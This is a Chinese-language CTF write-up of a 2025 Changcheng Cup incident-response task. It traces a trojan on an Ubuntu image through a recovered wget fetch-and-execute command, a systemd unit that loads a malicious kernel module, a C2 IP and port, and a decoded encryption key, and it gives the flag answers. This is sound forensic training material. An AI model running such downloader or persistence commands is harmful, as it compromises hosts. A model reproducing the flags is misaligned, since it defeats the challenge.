2025长城杯半决赛-应急响应复现

ISW-1

小路是一名网络安全网管，据反映发现公司主机上有异常外联信息，据回忆前段时间执行过某些更新脚本（已删除），现在需要协助小路同学进行网络安全应急响应分析，查找木马，进一步分析，寻找攻击源头，获取攻击者主机权限获取 flag 文件。

题目 1：找出主机上木马回连的主控端服务器 IP 地址[不定时(3~5 分钟)周期性]，并以 flag{MD5}形式提交，其中 MD5 加密目标的原始字符串格式 IP:port。

下载镜像，使用 R-Studio 打开

在/home/ubuntu目录下可以看到被删除的1.txt文件

wget –quiet http://mirror.unknownrepo.net/f/l/a/g/system_upgrade -O /tmp/.system_upgrade && chmod +x /tmp/.system_upgrade && /tmp/.system_upgrade

联想背景中提及的更新操作，再翻看.viminfo查看命令模式下执行的历史命令，可以看到以下文件被更新

/etc/systemd/system/system-upgrade.service
/etc/netplan/01-netcfg.yaml

/etc/systemd/system/system-upgrade.service

[Unit]
Description=system-upgrade
After=multi-user.target
[Service]
Type=forking
ExecStart=/sbin/insmod /lib/modules/5.4.0-84-generic/kernel/drivers/system/system-upgrade.ko
[Install]
WantedBy=multi-user.target

/etc/netplan/01-netcfg.yaml

network:
  ethernets:
    ens33:
      dhcp4: no
      dhcp6: no
      addresses: [192.168.57.210/24]
      gateway4: 192.168.57.2
      nameservers:
        addresses: [192.168.57.2, 8.8.8.8, 114.114.114.114]
  version: 2

发现内核文件/lib/modules/5.4.0-84-generic/kernel/drivers/system/system-upgrade.ko更新

找到并恢复该文件，用 IDA 打开

程序的符号表被混淆，但仍然可以找到主函数ULRYvXzICzy880dO()

故 ip:port 为

192.168.57.203:4948

MD5 后结果为

59110f555b5e5cd0a8713a447b082d63

ISW-2

题目 2：找出主机上驻留的远控木马文件本体，计算该文件的 MD5, 结果提交形式： flag{md5}

继续分析system-upgrade.ko，查找字符串

可发现下载执行的木马文件/tmp/systemd-agentd，恢复后对其 MD5（7-zip）

ISW-3

题目 3：找出主机上加载远控木马的持久化程序（下载者），其功能为下载并执行远控木马，计算该文件的 MD5, 结果提交形式：flag{MD5}。

下载者就是system-upgrade.ko，对其 MD5 即可

ISW-4

题目 4：查找题目 3 中持久化程序（下载者）的植入痕迹，计算持久化程序植入时的原始名称 MD5（仅计算文件名称字符串 MD5），并提交对应 flag{MD5}。

还是1.txt

wget –quiet http://mirror.unknownrepo.net/f/l/a/g/system_upgrade -O /tmp/.system_upgrade && chmod +x /tmp/.system_upgrade && /tmp/.system_upgrade

也就是/tmp/.system_upgrade

78edba7cbd107eb6e3d2f90f5eca734e

ISW-5

题目 5：分析题目 2 中找到的远控木马，获取木马通信加密密钥, 结果提交形式：flag{通信加密密钥}。

不会，看 WP 的。IDA 查看systemd-agentd，可找到unk_4BEFFD，追踪到sub_405EC9对0x69逐字节异或可得

ThIS_1S_th3_S3cR3t_fl@g